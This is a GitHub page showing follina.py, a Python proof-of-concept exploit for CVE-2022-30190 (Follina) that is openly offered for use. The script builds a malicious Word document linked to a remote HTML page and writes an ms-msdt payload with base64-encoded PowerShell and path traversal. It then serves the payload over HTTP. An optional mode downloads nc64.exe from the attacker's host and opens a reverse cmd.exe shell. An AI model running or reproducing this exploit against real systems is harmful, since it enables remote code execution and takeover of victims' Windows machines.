forked from Noxtal/follina
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfollina.py
104 lines (82 loc) · 3.17 KB
/
follina.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
import tempfile
import shutil
import os
import base64
import http.server
import socketserver
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="POC for CVE-2022-30190, aka follina")
parser.add_argument(
"--command",
"-c",
default="calc.exe",
help="The command to run on the victim (defaults to calc.exe)"
)
parser.add_argument(
"--ip",
"-i",
default="127.0.0.1",
help="IP to serve the payload on (defaults to 127.0.0.1)",
)
parser.add_argument(
"--port",
"-p",
type=int,
default="4444",
help="Port to serve the payload on (defaults to 4444)",
)
parser.add_argument(
"--output",
"-o",
default="maldoc.docx",
help="Filename for output, should end with extension .doc, .docx or maybe .rtf (defaults to maldoc.docx)",
)
parser.add_argument(
"--reverse",
"-r",
type=int,
default="0",
help="Instantiate a reverse shell connection from the target at port furnished. 64-bits systems only.",
)
args = parser.parse_args()
print("[*] Creating maldoc...")
command = args.command
host = args.ip
port = args.port
rport = args.reverse
filename = args.output
if not filename.split(".")[-1] in ["doc", "docx", "rtf"]:
print("[!] Filename should end with extension .doc, .docx or maybe .rtf...")
exit(1)
path = tempfile.mkdtemp()
shutil.copytree("docx", path, dirs_exist_ok=True)
with open(f"{path}/word/_rels/document.xml.rels", "rt") as f:
content = f.read()
content = content.replace("{target}", f"http://{host}:{port}/payload.html")
with open(f"{path}/word/_rels/document.xml.rels", "wt") as f:
f.write(content)
shutil.make_archive(f"{filename}", "zip", path)
if os.path.exists(f"{filename}"):
os.remove(f"{filename}")
os.rename(f"{filename}.zip", f"{filename}")
print(f"[*] Maldoc now available at ./{filename}")
print("[*] Generating payload...")
if not os.path.exists("www"):
os.makedirs("www")
if rport:
command = f'Invoke-WebRequest http://{host}:{port}/nc64.exe -OutFile nc64.exe;.\\nc64.exe -e cmd.exe {host} {rport}'
command = base64.b64encode(command.encode("utf-8")).decode("utf-8")
payload = f"""<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{command}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";
// {"A" * 4096}
</script>
"""
with open("www/payload.html", "w") as f:
f.write(payload)
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory="www", **kwargs)
with socketserver.TCPServer((host, port), Handler) as httpd:
print(f"[*] Now serving on http://{host}:{port} !")
httpd.serve_forever()